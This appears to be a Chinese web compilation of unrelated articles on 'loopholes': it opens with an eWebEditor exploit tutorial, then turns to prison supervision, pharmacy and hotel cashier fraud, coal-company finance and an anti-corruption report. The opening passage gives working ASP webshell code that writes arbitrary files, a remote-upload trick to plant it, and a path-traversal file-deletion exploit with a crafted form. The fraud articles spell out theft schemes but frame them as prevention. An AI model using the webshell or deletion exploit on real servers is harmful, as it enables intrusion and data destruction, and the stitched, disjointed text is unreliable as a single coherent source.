比如s_full样式就存在这个功能,打开编辑页面,然后图片,选择输入url 比如:http://site.com/1.gif.asp ! 然后选择上传远程文件!自动就把1.gif.asp 保存在上传目录内!注:网上的东西大部分传来传去,这个办法愚弄自己还成!文件的确显示后缀为.asp 但是不能访问,因为收集过来的时候自动截止在1.gif了所以后面的.asp等于没有!而且gif的内容就是我们这个url的路径!呵呵,后来又看到一个利用方式!是利用远程搜集的时候执行,我们文件的代码生成另外的小马!
利用代码如下:
首先建立1.gif.asp 代码如下
<%
Set fs = CreateObject(\"Scripting.FileSystemObject\")
Set MyTextStream=fs.OpenTextFile(server.Mappath(\"\\akteam.asp\"),1,false,0)
Thetext=MyTextStream.ReadAll
response.write thetext
%>
在我们的1.gif.asp的同目录下建立一个akteam.asp文件,内容就是我们的小马:
<%on error resume next%>
<%ofso=\"scripting.filesystemobject\"%>
<%set fso=server.createobject(ofso)%>
<%path=request(\"path\")%>
<%if path\"\" then%>
<%data=request(\"dama\")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%=\"succe\"%>
<%else%>
<%=\"false\"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%=\"\"%>
<%=\"\"%>
<%=\"\"%>
<%=server.mappath(request.servervariables(\"script_name\"))%>
<%=\"\"%>
<%=\"\"%>
<%=\"\"%>
<%=\"\"%>
<%=\"\"%>
<%=\"\"%>
利用上面说的远程上传的方式!可以得到webshell!成功率取决于,虚拟主机的安全设置!
11、任意文件删除漏洞!
此漏洞存在于Example\\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入!看代码
\' 把带\"|\"的字符串转为数组
Dim aSavepathFileName
aSavepathFileName = Split(sSavepathFileName, \"|\")
\' 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavepathFileName)
\' 按路径文件名删除文件
Call DoDelFile(aSavepathFileName(i))
Next
而aSavepathFileName是前面从数据库取出来的:
sSavepathFileName = oRs(\"D_SavepathFileName\")
看看D_SavepathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:sSavepathFileName = GetSafeStr(Request.Form(\"d_savepathfilename\"))
...oRs(\"D_SavepathFileName\") = sSavepathFileName
居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), \"\'\", \"\"), Chr(34), \"\"), \";\", \"\")
End Function
既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新闻,于是主目录下的eWebEditor.asp不见了!漏洞利用:
eWebEditor删除文件 byldjun(>
新闻列表%20|%20增加新闻
增加新闻
http://127.0.0.1/editor/Example/NewsSystem/addsave.asp\"
method=\"post\" name=\"myform\">
要删的文件(相对路径就可以了):
新闻标题(随便填):
标题图片:
无
当编辑区有插入图片时,将自动填充此下拉框
新闻内容(随便填):
推荐第10篇:监外执行:须多方堵塞“漏洞”
走出监狱后,监外执行犯能否珍视这一机会,真正走向新生?
最高人民检察院检察长贾春旺在十届人大二次会议上所作的工作报告中指出:“(检察机关2003年)在刑罚执行和监管活动监督中,对不依法交付执行,违法减刑、假释、保外就医以及体罚虐待被监管人等依法提出监督意见7055人次。”检察机关已把监外执行的法律监督列为2004年工作重点。就如何加强监外执行法律监督加以探讨,甚为必要。
监外执行是我国刑罚执行的一种,是对罪犯采取不予关押,放在社会上交由基层群众监督和派出所执行相结合的一种方式。监外执行罪犯包括缓刑、管制、剥夺政治权利、假释、暂予监外执行5类罪犯。从总体看,监外执行罪犯为数少,分布面广,居住分散,监督管理难度大。一些地区有关机关对这项工作重视不够,监外执行中时常出现虚管、漏管、脱管和失控,甚至又犯罪现象,成为影响社会治安的一个亟待解决的突出问题。
一、监外执行中存在的问题
从检察环节了解的情况看,监外罪犯刑罚执行问题主要表现在以下几个方面:
(一)法律文书未送达,交付罪犯脱节。有的劳改机关未按规定将原判法律文书或抄件、复印件、执行通知书或抄件、复印件、裁定书副本和犯人出监鉴定表,一并送交执行地的县级公安机关和人民检察院,只是给监外执行罪犯办理出监手续,让他们自己回执行地派出所报到至于罪犯实际是否到派出所报到全凭个人自觉性;有的执行机关在收到罪犯监外执行的有关法律文书后归档了事,接收来报到的罪犯后,又未及时向移交罪犯的监所回复,双方互不通气,交接环节出现漏洞,为监外罪犯脱管、失控提供了条件。
(二)监督机制不健全,管理措施不得力。有的执行机关把刑满释放人员列入重点人口管理,却没有将监外执行的罪犯列为重点人口管理,有的没有建立监外罪犯档案,没有成立帮教组织和落实具体的监督考察责任制度,有的监狱给患病罪犯办了保外就医手续,把罪犯交给当地派出所就不管了,(按规定一年应办一次保外手续)对监外执行罪犯的表现、去向无从掌握,出现虚管、漏管、脱管、失控等现象。
(三)执行程序未到位,监管不严。有的执行机关没有按照刑事诉讼法的程序规定,向罪犯及其原所在单位或者居住地群众宣布其犯罪事实、执行考验期限,以及执行期间应当遵守的规定。对监外执行罪犯的变动情况,未通知人民法院或人民检察院,对执行期满的未按规定通知本人,并在一定范围内宣布解除,一方面造成监外罪犯成了“终身制”的“编外公民”,另一方面该收监的不收监,姑息养奸,贻害社会。
二、监外执行产生诸多问题的原因
监外罪犯刑罚执行存在不少问题,原因是多方面的。
1.有的执行机关和个别领导对监外罪犯刑罚执行的监督管理重视不够。错误认为监外罪犯不是有病在身,就是罪行较轻或在劳改期间改造较好的,下了锅的“泥鳅”掀不起大浪,思想麻痹,未能把这项工作当做一项社会治安综合治理的大事抓紧抓好,有的认为目前警力紧张,多一事不如少一事,把对监外罪犯的管理监督当做一种额外负担,没有负起应有的责任和发挥积极作用。
2.负有执行任务的监狱、看守所和公安机关,经办人员调动频繁,业务不够熟悉。有的给刑期未满的监外罪犯办理释放手续,用的是制式的“刑满释放证明书”,弄得执行地派出所无所适从,有的对监外罪犯的有关法律文书该送交的不懂得送交,执行通知该下达的未下达,该指定当地派出所或有关单位执行的不知道指定,造成监外罪犯交付执行上的脱节。
3.罪犯“交付”监外执行的规定不具体,实践中不便操作。这是执行地派出所普遍反映的问题。对需要监外执行的罪犯,在交付的问题上,究竟是由监狱或看守所把罪犯交付到执行地派出所,还是执行地派出所到监所接管罪犯,无明确规定。
4.有些地方的检察机关对监外执行工作督促指导不够。有的多年未作检查,放任自流;有的虽有检查,但时紧时松,发现问题不及时,解决问题不得力,监督管理职能很难落实到位,监外罪犯刑罚执行流于形式。
5.监外罪犯亲属配合帮教不力。他们中的多数人存在片面认识,错把监外执行和考验当做刑满释放,认为对监外执行罪犯无需帮教。
三、完善监外执行的对策与建议
(一)监外罪犯交付执行应确保到位。有关部门应在现有的交付执行规定的基础上,制定更为明细的规定,便于各执行机关在实践中具体操作,保证监外罪犯从监狱或看守所到执行地派出所之间的交接到位,避免交接过程中的脱管失控。
(二)建立监外罪犯近亲属担保追究制。针对有些监外罪犯出监后,不到当地派出所报到接受管理监督,随意出走,脱管失控,甚至流窜外地重新犯罪,给社会造成危害的问题,很有必要建立监外罪犯近亲属担保追究制,建议在刑事诉讼法中增加这一条文:凡是被判决、裁定管制、剥夺政治权利、缓刑、假释和暂予监外执行的罪犯要提出保证人或交纳保证金,保证人必须具备以下条件:有能力履行保证义务;享有政治权利,人身自由未受到限制;有固定的住处和收入。保证人应履行以下义务:监督被保证人遵守监外刑罚执行规定;发现被保证人可能发生或已经发生违反有关规定行为的,应当及时向执行机关报告;保证人未及时报告的,对保证人处以罚款,被保证人在执行期间重新犯罪的,在依法惩处被保证人的同时,对保证人处以一定制裁措施。通过实行监外罪犯近亲属担保追究制,促使监外罪犯的近亲属积极参与对罪犯的监督管理教育,实施内部“自治”,在目前警力紧张的情况下,可起到良好的辅助作用,监外罪犯慑于亲属家庭利害关系,不敢随意违规违法,增强守法改造的自制力。
(三)强化监外罪犯监管责任。一是检察机关应强化对监外罪犯执行工作的监督,加强对监外执行中违法行为的处罚,尤其要着重查办牵涉其中的职务犯罪;二是执行地派出所统筹安排,把监管任务分解到片区民警,专人负责;依靠基层组织、单位保卫部门、治保会动员监外罪犯家属进行帮教;三是完善奖惩制度,把这项工作列入考评内容,对于成绩突出的,予以表彰奖励,对于不能履行职责,造成监外罪犯漏管、脱管、失控或重新犯罪的,追究一定责任。
(四)完善监外刑罚执行程序。目前,监外罪犯刑罚执行,除了如何交付这个程序环节不够具体外,其余比较明确,从判决、裁定法律文书的送达,到指定单位执行,从接受罪犯应告知的规定,到监外执行期满的宣布解除,均有具体规定,其中的每一个法定程序都有它应有的作用,不可随意缺漏,有关部门只有严格按程序执行,才能使监外罪犯刑罚的执行落到实处,维护法律的权威。
(五)加强司法部门联合回访考察。可由政法委牵头,每年组织司法部门联合对监外执行情况进行一至二次全面回访考察,发现问题及时纠正,通报有关情况,推广经验做法,把监外罪犯刑罚执行真正落到实处。
第11篇:如何堵住药店收银漏洞
如何堵住药店收银漏洞
收银漏洞,是指收银员将不属于自己的钱据为己有,药店却又无法有效控制。前不久,某药店店长就向笔者谈及这样一件让他头疼的事——
该药店的营业面积为150平方米左右,有店员36名,包括2名收银员,2名中药营业员,2名保安员,其他30名店员分为A、B两班。这样的人员配置对于不大的店面来讲比较合理。可自去年8月起,该店每个月盘点时都发现有诺和灵、阿胶等贵重药品丢失的现象。“我们店上月盘点阿胶就少了10盒,才没几天又少了5盒。一盒180元,我们得赔多少钱啊。”对于频繁丢药的事,店员比较心焦。据笔者了解,该店自从出现贵重药品连续丢失的现象后,店里严加防范:将贵重商品设立台帐,每天进行交接;对于入库单、调货单等每天一结,如有未做单或来货有单无货者及时处理;细化了全体员工的防损奖惩制度,进一步提高店员和保安的防损意识。这样疏而不漏的防范措施,贵重商品是丢得少了,可在第三个月的盘点中又发现了新问题:一些无返点且价格较高的商品开始丢失。因为店员平时不注意此类商品的单据维护,只是查阅当天所销售高毛利商品的小票,核对商品数量,并以小票的数据计量。“也许是我们对低毛利商品‘不感兴趣’,才让收银员抓住了弱点。”店员马晓清突然领悟。据她介绍,店里3个月内不同商品蹊跷丢失的现象,不少店员开始将怀疑对象锁定在收银员身上。经过1个月的调查,的确发现了问题:
有一天,一位顾客焦急地买了6盒某品牌的感冒药就跑出去了,收银员并没有接着打出购物小票,而是将这笔帐挂单后继续招呼其他顾客。还有一次,是顾客买了10盒某降压药,中午闲暇时,一位店员故意找出本次销售的小票加以核实,果然不出所料,收银员将10盒的量只输入了7盒,其他3盒随着她的指尖“不翼而飞”了。前后两件事,让店里丢药的根源浮出水面。
识破三种收银作弊的方法
那么,收银员是如何“变药为钱”而中饱私囊的呢?笔者现将收银漏洞的几种常见方法略作分析:
方式一: 漏扫商品
这是最常见的做法。但漏扫商品仅有不超过5%的部分进入收银员的腰包。
一种情况是无心漏扫。因为药店人员的流动性大,且收银工作枯燥,一些新入职的或注意力不集中的员工做收银员时,都有可能出现漏扫商品的现象。因为是漏扫,只要顾客付款金额与电脑显示的金额一致,就不会出现此单的长短款,只是漏扫的这部分商品会不明不白
地流失。这样的流失,店员在来货、调货的单据上很难找到答案,所以往往会按制度一起赔偿。
另一种情况是故意漏扫,收银员肯定会在事后想法转移赃款。举个最简单的例子:某胃药5元一盒,顾客买了20盒共100元。收银员虽收了人家100元,可输数量的时候只打进去15盒,这样,25元就没了。但这种做法会有很大的风险,所以有漏扫现象的都是工作经验比较丰富的老收银员,他们会察颜观色,一般碰到心急或不细心的顾客,他们会偶尔操作一下,而对老年顾客一定不敢这样的。
方式二: 偷梁换柱
药店里同名且价格也相同的商品很多。而由于品规太多,店员要记住所有商品的价格是不可能的事。因此,如果从药店里拿一堆商品过来,相信没有几个店员能全部说出哪种药品是多少钱的。这就给收银员偷梁换柱提供了条件;还有就是一些无条码的商品,或者是使用内部编码销售的商品,被偷梁换柱的几率就更大了。这时候,不良的收银员可以在收银的时候,将高价商品按另一个低价同类商品的店内编码输入电脑收银,一件货的差价就会让人吓一跳了;或者是面对一些购药件数多而且数量也多的顾客时,收银员不按顾客实购的数量输入,也会出现商品莫名地流失的现象。那时做店长的才会惊呼:原来抓住几笔挂单销售的商品,在不良收银员手里真的只能算是“小儿科”
了。
方式三: 频繁取消
这种方法是最难发现的。收银员在操作时,都是使用自己个人掌握的密码进入系统,其他人无法进入。而且收银员多是自己收银、入单,很容易进行“暗箱操作”。比如挂单现象,对于性急的顾客,收银员可以“减速”收银,在顾客大额买单没要电脑小票的时候将此单挂起,再随便打个如棉签之类的小商品,直接点“收银”,当着店员的面将小票取下来撕掉丢在垃圾筒里,不管是店员还是防损员,看到的是收银员已打出了小票,只是顾客没要,于是撕了丢到垃圾筒里了。顾客离开后,虽然收银员按棉签这种小商品出票了,但前一单仍处于挂单状态。这时她再调出来,对部分商品进行取消操作(有的药店如果对收银员设置有全单取消的权限,那么挂单也许会被收银员全单取消掉),然后才按收银结账。这样,他便能迅速地算出钱箱里有多少钱是自己的,找个机会拿出来就行了。
管理建议
药店除要求防损员或协管员等重点监察收银台外,要树立全员防范意识。一是实行接待首问负责制,除了向顾客推荐所需药品及提高优质服务外,还要将顾客带至收银台,直至顾客结完账才离开;二是
店员要对自己当天所销售的贵重商品做到心中有数,平时也要多留意一下收银员所打出的商品小票,看有无漏单、错单或漏数量的现象,这样,可以降低不良收银员恶意操作的机会。
第12篇:如何改进现行财务漏洞
如何改进现行财务漏洞
对煤炭企业实施集中财务管理的现实思考
摘要] 随着我国IT业的飞速发展,经济体制改革的不断深化、市场经济的日益完善和应对加入WTO之后的各种挑战,许多企业在财务管理工作中应用了高新技术,完成了财务联网,实现了会计电算化,收到了明显的效益。韩城煤业集团公司历经七年的会计电算化不断总结和提升,现在已经成熟,并升级到用友U850版集中财务管理软件,并一举走在陕西省煤炭企业会计电算化的前列。但是,随着煤业集团规模的不断扩大和业务的不断拓展,信息量大大增加,但信息的获取时间却拉长了,信息的准确性也打了折扣。旧的财务软件在煤业集团企业的财务管理中存在着许多问题,如果无法随时了解各二级或三级单位的财务经营情况,无法深入进行财务工作的垂直化管理。因此,在韩城煤业集团公司乃至我国各大煤炭企业集团选择新的财务软件,建立一个全面、高效、以全面预算管理为核心的财务管理信息体系势在必行。
[关键词] 煤炭企业 集中财务 信 息 化 内部控制 管理体系
随着企业对管理的要求不断提高,很多集团型企业已不满足于仅在会计期末的数据集中查询,而要求实时的信息查询与处理,并要求在新的技术平台上能实现跨账簿、跨企业、多维的数据统计与分析。互联网技术的高速发展,解决了这一要求在技术上的瓶颈,一些IT软件提供商也提出对传统的处理流程进行修订,提出由集团总部统一设立“一账式”会计账簿,统一制定会计科目、人员权限、业务流程等,各子公司在上级公司规定的范围内增设会计科目、人员等,并基于互联网在异地独立录入数据,电子数据集中存储于集团总部数据库,并由集团总部统一结账、编制会计报表。
陕西韩城煤业集团公司经历了七年的会计电算化不断总结和提升,完成了以用友软件为核心的集中财务管理,一举走到了陕西省煤炭企业会计电算化的前列。但是,对于煤炭企业集团来说,无论是煤业集团总部本身还是处于不同层次的煤业成员公司,都有着共同的理财目标,即股东财富的最大化。尽管煤业集团总部复杂的组织结构中有复杂多样的利益主体,且不同的利益主体有不同的利益目标,但无论各利益主体之间发生什么样的利益冲突,其他利益主体(包括经营者、债权人、劳动者等)的利益最终都要服从于出资人的利益,为了这个目标就必须采取有效的财务管理方法。 1分散财务管理的缺陷
煤炭企业过去传统的分散型集团财务管理流程依据传统的四个会计假设——会计主体、会计分期、货币计量和持续经营,以反映单个会计主体的经营信息为中心,通过合并报表实现对整个集团经营情况的了解。在经济发展的今天,“分散”式的财务管理主要存在以下几方面的缺陷:
1.1信息失真,难以为科学的决策提供依据
目前我国相当多的煤炭企业内部信息存在严重不透明、不对称和不集中的现象,甚至人为制造信息孤岛,使得煤炭企业的高层决策者难以获得准确的财务信息。据财政部会计信息质量抽查证实,全国80%以上的企业会计信息存在不同程度的失真。而煤炭企业由于地点分散,条件艰苦,信息传递缓慢,会计信息失真的情况依然存在。
1.2财务核算各自为政,难以掌握完整的会计信息
在煤业集团层次,“分散”式管理实际上只存在一个报表合并的主体,并不存在一个集团性质的会计核算主体,集团整体的财务信息只是经过合并生成的3张或多张报表,并不存在整个集团的明细账与总分类账的汇总,在这3张或多张报表之外,对集团企业更有价值的经营信息却不能清楚地得到。虽然集团总部作为法人企业,存在单独的账簿,但只是在对外投资上对子公司的净资产变动进行粗浅的记录。而集团型企业在实际管理中,为了更准确地做出决策,不仅需要知道子公司的整体经营情况,也需要知道子公司详细的经营信息。如:陕西韩城煤业企业集团,在韩城等地有30多个二级矿井和附属厂,不仅需要单个子公司整体的销售收入,更需要每个子公司明细的销售数据,以形成对市场上产品需求变动的判断。而“分散”式的财务管理,以报表作为子公司经营信息载体,以合并报表方式得到集团整体经营情况,使有用的信息很难收集到集团总部,极大地降低了财务信息的完整性,降低了财务信息的价值。
1.3监控不力,缺乏事前、事中的严格监督
目前大部分的煤炭企业,都在自己单位搞财务核算,有些单位离集团远,较偏僻,交通和通讯等方面较落后,这种状况就使得煤炭企业普遍存在对企业领导缺乏有效的监督和控制,管理严格的企业可能进行个别的事中审计和监督,而其他企业可能只在年终形成了既定事实的情况系进行所谓得业绩考核,失去了管理的意义。在资金的运作和管理上也存在着内部人控的现象,资金的流向与控制脱节。不少煤炭企业难以及时掌握二级单位的财务资金变动情况,因此,时常面临巨大的财务风险。
1.4资金散乱,使用效率低下
目前,煤炭企业集团对下属的企业控制存在一定的问题,最主要表现在资金集中管理的需要和内部多级法人资金分散占用现实的矛盾已成为现阶段企业财务资金管理中最突出的问题。典型的情况包括:子公司多头开户严重,资金管理严重失控;投资决策随意性大,有些子企业不顾自身的能力和发展目标盲目投资,从而影响集团正常的资金链状况;资金沉淀严重,占用不尽合理,货款拖欠高居不下,产成品资金有增无减,周转缓慢,企业信用和盈利能力下降。
1.5信息滞后,难以迅速传达会计信息
在“分散”型的管理模式下,只有在会计期末,各个会计主体结账后才可得到有关子公司经营情况的会计报表。而现代煤炭企业经营,对市场的反应与资金的回收速度要求较高,负责销售的子公司一旦出现存货积压,经营信息必须快速地反馈集团总部,由总部向负责生产的子公司下达调整产量的命令,并通知资金管理部门注意财务风险,因此,以月为单位的信息报送是不适用于现代煤炭企业管理的。如:韩城煤业销售公司煤炭销售的相关信息以手机短信的方式,每天发送到企业领导和生产销售人员手中,实现了销售信息的及时反馈,为领导层提供了便捷的决策信息。 1.6管理粗放,难以统一核算口径。
在“分散”的管理模式下,各个子公司的财务部门独立设立账簿,核算的口径与方式很难统一。实际上,早期的以报表为信息传递主要载体的方式,本身就无账簿中会计科目、多栏账设置、收入与支出确认等核算方式统一的要求,各个企业的会计人员只需年末在统一的报表格式上填上相应的数据即可。
1.7、约束机制不健全,难以保证子公司人员的独立性。
分散型的管理模式使子公司人员的独立性很难保证。在企业内部管理上,子公司的财务人员一方面面向子公司的管理者,另一方面面向集团层管理者。如果没有快速的信息反应渠道与统一的财务管理,即使采用了会计人员委派制,在子公司内部工作的财务人员也将面临巨大的压力,造成独立性的丧失。如:韩城煤业集团公司实行的财务科长委派制,就存在这样的问题。
以上这些缺陷,可以用一句话形象地概括:“手不够长、眼不够亮”。这句话在煤炭企业集团层次与规模不断扩大的现实中,体现得更为突出。从财务管理的核心上讲,对于煤炭企业集团总部,作为一个投资主体,会计核算的核心对象——资金流,其流动方式不再是“资金—采购—生产—销售—增值资金”方式,而转为“资金—投入—增值资金”,虽然在其投入环节,产生利润后依然遵循原有的方式,但这种转变增加了新的财务管理目标——价值增值,并且在集团型企业中成为主要的财务管理目标。分散型的财务管理模式则立足于信息反映与监控,是无法实现这一目标的。 2煤炭企业集团实施集中财务管理的方式 2.1集中财务管理实施的方式
煤炭企业集团实行集中财务管理,在实际运作时采取的具体策略或方式应视各个集团的不同情况而有所区别。总的来说,有以下几种方式可以参考:
2.1.1通过财务公司或资金结算中心实现资金的集中管理 资金是企业的血液,资金管理则是企业财务管理的中心。对企业集团而言,母公司只有控制了子公司的财务收支,控制了其资金的流动,才能便子公司按照母公司所确定的发展战略开展生产经营活动。资金的集中管理有多种实现方式,目前比较常见的是在母公司设立资金结算中心或由集团内各成员企业共同出资成立财务公司。作为集团内部的一个独立法人,财务公司是全面负责集团内所有成员企业资金管理的非银行金融机构。无法成立财务公司的企业集团可在集团公司设置与财务公司功能相似的资金管理职能部门资金结算中心。无论是财务公司还是资金结算中心,都具有以下功能: (1)、结算功能(2)、内部监控职能(3)、资金融通功能。财务公司除了具有上述三种职能外,还可发行财务公司债券和进行同业拆借来为各成员企业融通更多的资金;另外,还可为成员企业办理买方信贷和资产重组等业务。
2.1.2实行全面预算管理
在煤炭企业集团内部实行全面预算管理,不仅可以提高管理的效率,优化资源配置,而且有利于明确母公司与子公司各自的责权利,实现集团的整体战略目标。为了搞好预算管理,应在煤业集团公司董事会下设预算管理委员会,负责预算的编制、审定和组织实施及调整。在编制预算时,一般宜采用上下结合的方式,即首先由煤业集团公司根据整个集团的发展战略提出预算目标,并将其进行分解下达给各子公司,然后各子公司结合自身情况编制各自的预算草案,最后由预算管理委员会对各子公司的预算草案进行汇总和审核,并召集各子公司的经营者进行预算的协调与调整,最后由预算管理委员会审批通过。在预算的执行过程中,煤业集团的各级预算部门可通过建立严格的工作制度和实施适当的激励措施来保证各级预算目标的完成。若在预算的执行过程中出现需要调整的情况,则须经煤业集团公司的预算管理委员会批准。预算管理委员会还应制定相应的标准来对各子公司的预算完成情况进行考核,并据以进行奖惩。比如:兖州煤业集团和晋城煤业集团已经在这方面进行了有益的探索,并且取得了较好的效果,陕西韩城煤业集团公司不久也会实施。
2.1.3实行财务总监委派制和财务人员资格管理制度
煤业集团公司为了实现对子公司的财务监控,可依据产权关系,以出资人的身份向其全资子公司和控股子公司派出财务总监。财务总监应是子公司董事会成员,参与公司重大事项的决策,是母子公司之间信息沟通的桥梁。为了保证其相对于子公司的独立性,财务总监的工资、奖金和津贴应由集团公司统一管理和发放,而且应该实行财务总监定期轮岗制。
实行财务总监委派制,不但可以便集团公司的整体战略方针在子公司得到较完全的体现和贯彻,而且能够规范子公司的财务活动,确保财务信息的真实和准确,有利于集团整体战略目标的实现。母公司应对子公司财务人员实行资格管理制度,由财务总监审查其上岗资格,并报母公司备案。应注意的是,财务总监只是母公司派驻子公司监督经营情况的监督者。子公司为了开展财务工作,还应有其自己的财务主管,该财务主管对子公司的经营者负责,并不受财务总监的直接领导。
除了上面介绍的三种方式以外,煤业集团公司还可通过使用集中式财务软件或强化集团内部审计制度等方式加强对各子公司的财务控制,以实现集团财务的相对集中管理。目前,我们韩城煤业集团公司结合自身的实际情况,选择使用集中式财务软件(用友U850版本代替原使用的用友8.11a版本),实施了软件升级,实现了集中财务管理,在整个韩城煤业集团内实现价值的最大化为最终目标的集中财务管理模式。
3实施集中财务管理的现实意义
煤炭企业集团要正常发展,集团整体利益与下属子公司及其管理者的利益还需保持一致,所以煤炭企业集团财务宜集中管理。总之,通过以上的综合调研和分析,集中财务管理模式有助于煤炭企业集团统领全局,而又兼顾效率;既保证了子公司财务部门一定的独立性,又保证了财务信息的真实、准确。因此,在我省乃至全国煤炭企业建立一个全面、高效、以全面预算管理为核心的集中财务管理体系势在必行。 参考文献:
[1] 国家煤炭经济研究会.《煤炭经济研究》.北京.煤科总院经济与信息所.2004.[2] 全国优秀经济期刊.《财会月刊》.武汉.财会月刊杂志社.2005.8.[3] 中华人民共和国财政部.《会计电算化管理办法》.北京.2000.[4] 科学技术部.《计算机应用文摘》.重庆.科学技术部西南信息中心.2003.22.[5] 用友软件.《用友软件U8管理手册》.北京.用友软件股份有限公司.2005.[6] 何国家,师自平.《煤炭信息》周刊.北京.2005.[7] 王景新.《最新财会电算化手册》.北京.中华工商联合出版社.2005.5.[8] 陕西省企业联合会.《现代企业》.陕西.现代企业杂志社.2005.[9] 韩城矿务局煤炭经济研究会会刊.《韩煤经济研究》.陕西.韩城矿务局.2004.1.[10] 韩城矿务局.《韩煤科技》.陕西.韩城矿务局.2004.3.
第13篇:酒店前台常见的漏洞
最容易被不法员工利用的酒店管理漏洞
一、酒店员工利用以下管理漏洞,非法侵占酒店财产,损害投资人利益:
二、前台不登记直接发房卡,房费据为己有;
三、客人换房不清卡,前台二次利用被换房间房卡,开钟点房谋取私利;
四、客人结账退房不清卡,前台再开钟点房谋取私利;
五、客人开取的发票金额与消费金额不等同,前台私吞多开发票税金;
六、前台通过修改房价赚取差价;
七、前台利用房费折扣权限赚取差价;
八、前台外购商品替代酒店客人消费赚取差价;
九、客人用现金结账,前台故意操作成挂账或者刷卡结账,把现金据为己有;
十、前台私自结取已退未结客人钱款,据为己有;十
一、前台将已退未结客人重新入住,押金余额据为己有;十
二、前台利用大小头单据或阴阳单,赚取差价;
十三、前台与房务勾结,私吞房费。
怎么防范上述酒店管理漏洞
酒店中,收银点一般会根据结算工作需要,从财务部领取一定备用现金,以便日常收款结算时找零兑换使用。为防止收银私自挪用备用金,酒店相关监管部门必须做到不定期抽查备用金使用情况,尽量减少收银备用金数额,如每班次收银发生现金长短款时,必须要求收银员认真自查,对不明原因的长短款,长款要如实上交财务,短款由责任人赔偿。
在酒店中,一般发生长款的原因多是由客人找零而发生的,酒店管理者不要忽视长款的管理,因为日积月累的找零长款,也是极易滋生漏洞的源头,所以,必须加强管理,认真对待。
1、账单的使用漏洞及管理。
收银管理中,账单的管理也至关重要,曾经发生多例酒店账单管理混乱,收银员趁机私自收费后销毁账单,截流现金收入现象。所以,在日常收银账单的管理上,应当采取以下措施来进行监控管理:
(1)账单使用必须填制账单控制报表,并要求收银不得跳号使用,必须连号使用。
(2)作废账单必须在账单上详细注明作废原因,由两名以上相关工作人员签字,收银主管审核签字确认。
(3)每次收款,押金单与账单必须一同上交财务。
2、变更收费标准,进行作弊。
客人结账时,收银将单价更改,多向客人收费,而按实际单价入账,此种作弊现象不仅给酒店造成经济损失,一旦被客人发现,更是会给酒店造成极其恶劣的影响。所以,对待此问题,一是要加强日常员工队伍教育,二是一经发现,坚决对当事人予以辞退,树立良好的职业氛围。
以上只列出一部分酒店管理漏洞解决办法、大家可以去下载《金天鹅酒店管理防漏宝典》,里面列举了一百多项酒店常见管理漏洞及解决方案。
二、酒店管理常见漏洞
工作中酒店员工利用管理漏洞和职权和利用酒店管理漏洞,或者因为酒店管理软件漏洞百出、不严谨等原因引发的依法现象。 1不登记直接发房卡;
2、通过换房不清卡,开钟点房;
3、结账退房不清卡;再开钟点房、凌晨房等;
4、发票,开票金额与客人消费金额不等;
5、通过修改房价赚取差价;
6、房费折扣的冲调权限而赚取冲调的费用;
7、现金结账,采用挂账或者刷卡结账;
8、客房商品和前台商品通过外网赚取差价;
9、已退房未结账客人一定时间段内未结账,私自结取金额,或者重新入住然后退取押金,私自赚取;
10、离店客人的账务随意反结;
11、利用大小头单据或阴阳单赚取差价;
12、前台与房务勾结,私吞房费;名词解释
哑房账:一些会议或大型活动时,有些或客人只交会议费而没有开房间,形成了“哑房账“
非平客人:个别客人住房时,离开酒店却没有办离开手续,押金仍留在酒店,被称为“非平客人“。
金天鹅防漏问答:
1、把以前“哑房账“和非平客人”的剩余押金转移到新入住客人的账务,结账时,将转过来的剩余押金做退款处理,然后从收银台备用金中拿走相应数额的现金。答:非平账务、哑房账操作需要验证权限;
2、收费系统存在漏洞,在打印收据时,只有在确认打印成功后,计算机才会存入收据内容。前台利用软件漏洞,人为操作,造成计算机里保存的数据与打印的收据数据不符,开具大头小尾的收据。
答:先入账再打印,单据编号连须唯一,并且记录每笔收会款的打印次数。错误的单据只能冲红,不能删除。
3、夜审前当班的服务员通过提前打印客人结账的账单,然后修改房价正常过夜审,赚取修改房价前与房价后的差额。
答:修改房价,换房等在交班报表中有房单异动体现,严谨的房价修改权限控制,财务核账时会发现押金单上房价与结账单房价不一,财务需要有严谨的审核制度。
4、前台通过将待结客人的余额转到住宿客人的名下(一是客人逃账,待结金额为正,前台为了逃避责任,通过冲调,修改房价等,将金额转到住店客人名下。二是以退未结客人账务时间过长,前台服务员把未结余额转到住店客人名下)。
答:每日有走结客人已结账报表财务需要关注。走结客人结账必须权限验证才可重结。
5、客房与前台相互作弊,将已退但未到退房时间的房间出售,软件则不做退房处理。答:班结表中体现当班异动:退房超时报表,结账未退房会自动加收房费,软件结账后会自动退房,同是坷设置不退房不打印结账单。
6、混合结账时,明现金结账,采用挂账或其他结账方式,所收现金不入账。答 :班结表体现当班挂账,刷卡结账、刷卡要有相应单据和签单表,财务审核要严谨,
7、日租房:收银与接待合伙利用换房的操作来侵占酒店收入:(1)客人当天入住当天退房,以现金方式结账,收银未在电脑中进行退房账务操作(或先挂走账再恢复至结账前状态,或先按正常结账后周 马上恢复至结账前状态)。 答:当日挂账与挂走账报表供财务查询。反结账需要权限验证。
(2)张先生客人退房的前后恰好李先生客人入住,接待先删除李先生客人入住记录,再将张先生客人电脑中做换房操作,换至李先生客人刚才删除的房号中,同时将张先生客人电脑中所有资料更改为李先生客人资料,并将张先生客人所有账单、登记单据销毁,已此操作将张先生客从日租房费侵占。
答:换房必须清卡,账单据无法删除销毁,只能冲调,有冲调记录查询。
8、半天房:收银利用时间差与管理人员合伙侵占半天房费。
第14篇:制度漏洞评估分析报告
制度漏洞评估分析报告
根据《国土资源系统开展反腐倡廉制度建设年活动实施方案》的通知要求,我局对查找出的权力关键点、权力运行的风险点及制度漏洞,开展评估分析工作,现将有关情况汇报如下:
一、以工作重点领域为依托,查找权力的关键点、权力运行的风险点
